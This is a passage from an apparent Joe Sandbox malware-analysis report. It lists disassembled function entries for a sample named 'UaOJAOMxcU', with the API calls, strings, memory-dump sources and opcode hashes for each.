                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$Init$ClearCopy_memmove
                    • String ID: d}K
                    • API String ID: 2932060187-3405784397
                    • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                    • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                    • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                    • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                    Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                    • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                    • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                    • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                    Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                      • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                    • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                    • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                    • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                    • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9